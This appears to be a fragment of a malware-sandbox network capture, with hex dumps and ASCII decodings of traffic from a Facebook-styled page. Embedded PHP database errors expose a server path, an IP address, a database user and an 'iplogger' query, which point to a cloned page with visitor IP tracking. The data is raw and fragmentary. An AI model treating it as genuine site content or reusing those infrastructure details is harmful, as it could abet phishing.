2022-10-07 13:59:00 UTC	373	IN	Data Raw: 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 Data Ascii: 3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/1
2022-10-07 13:59:00 UTC	375	IN	Data Raw: 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f Data Ascii: qli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/
2022-10-07 13:59:00 UTC	376	IN	Data Raw: 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f Data Ascii: 0253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfo
2022-10-07 13:59:00 UTC	378	IN	Data Raw: 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 Data Ascii: 0on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t
2022-10-07 13:59:00 UTC	378	IN	Data Raw: 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 Data Ascii: 00%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u0025
2022-10-07 13:59:00 UTC	379	IN	Data Raw: 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f Data Ascii: u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520colo
2022-10-07 13:59:00 UTC	381	IN	Data Raw: 33 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 Data Ascii: 3A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E
2022-10-07 13:59:00 UTC	382	IN	Data Raw: 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 Data Ascii: l%253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageF
2022-10-07 13:59:00 UTC	384	IN	Data Raw: 35 54 75 61 4b 5a 50 73 56 44 69 55 52 32 6b 6c 4e 76 42 5f 71 37 44 7a 42 4d 74 34 46 6e 65 5a 58 5a 5f 48 44 51 56 68 64 48 46 38 6a 6b 68 32 66 58 4d 67 5f 6c 64 77 34 62 48 7a 53 45 47 39 46 61 32 49 59 41 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 Data Ascii: 5TuaKZPsVDiUR2klNvB_q7DzBMt4FneZXZ_HDQVhdHF8jkh2fXMg_ldw4bHzSEG9Fa2IYA" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulle
2022-10-07 13:59:00 UTC	385	IN	Data Raw: 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about A
2022-10-07 13:59:00 UTC	387	IN	Data Raw: 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 42 6b 59 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 2d 77 55 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 4b 55 41 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 57 70 51 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 47 2d 59 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 Data Ascii: ":"AT7B-2KeH1gOOVfLBkY"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOA-wU"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4KUA"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZWpQ"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxG-Y"},"819236":{"result
2022-10-07 13:59:00 UTC	388	IN	Data Raw: 52 73 70 45 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 Data Ascii: RspE"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLA
2022-10-07 13:59:00 UTC	390	IN	Data Raw: 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 Data Ascii: .php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
2022-10-07 13:59:00 UTC	391	IN	Data Raw: 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 58 44 44 2d 50 31 58 39 38 4b 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 72 5c 2f 53 69 78 4d 30 33 41 58 45 77 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 Data Ascii: \/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/XDD-P1X98Kq.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/SixM03AXEw8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IaR\/6uP":{"type":"js","src":"https:\/\/stat
2022-10-07 13:59:00 UTC	393	IN	Data Raw: 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 77 41 32 57 36 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 51 78 68 59 47 51 37 65 31 4b 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 4d 2d 43 32 73 4c 46 4a 50 30 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: ","nc":1},"hIwA2W6":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/QxhYGQ7e1K0.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/M-C2sLFJP0M.js?_nc_x=Ij3Wp8l
2022-10-07 13:59:00 UTC	394	IN	Data Raw: 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 73 56 46 6f 31 75 63 36 49 34 50 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 79 75 55 30 35 61 47 58 33 7a 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 52 57 4b 4f 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 Data Ascii: et\/rsrc.php\/v3\/yH\/l\/0,cross\/sVFo1uc6I4P.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/yuU05aGX3z5.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0RWKOAc":{"type":"js","src":"https:\/\/st
2022-10-07 13:59:00 UTC	396	IN	Data Raw: 2c 22 6b 4f 45 48 76 70 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 6e 53 5a 37 34 46 46 2d 7a 79 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 59 65 33 48 37 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 77 4e 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5f 4a 47 43 51 67 35 6b 69 4c 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e Data Ascii: ,"kOEHvpu":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/nSZ74FF-zyM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"6Ye3H7E":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iewN4\/y_\/l\/en_US\/_JGCQg5kiLh.js?_nc_x=Ij3Wp8lg5Kz","n
2022-10-07 13:59:00 UTC	397	IN	Data Raw: 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 78 5c 2f 41 67 70 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 7a 79 61 4b 33 56 44 67 5a 47 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 36 51 77 57 56 49 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 Data Ascii: tatic.xx.fbcdn.net\/rsrc.php\/v3\/yv\/r\/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dx\/AgpO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/zyaK3VDgZGc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L6QwWVI":{"type":"css","src":"https:\/\/static
2022-10-07 13:59:00 UTC	398	IN	Data Raw: 5c 2f 79 71 5c 2f 72 5c 2f 68 6b 49 4b 57 6f 71 64 68 69 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 32 78 69 74 32 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4e 4f 56 34 5c 2f 79 57 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 50 39 45 4a 42 5f 5f 62 79 59 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4e 52 54 6c 6e 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 Data Ascii: \/yq\/r\/hkIKWoqdhiL.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"s2xit2v":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNOV4\/yW\/l\/en_US\/P9EJB__byYG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iNRTlnq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.p
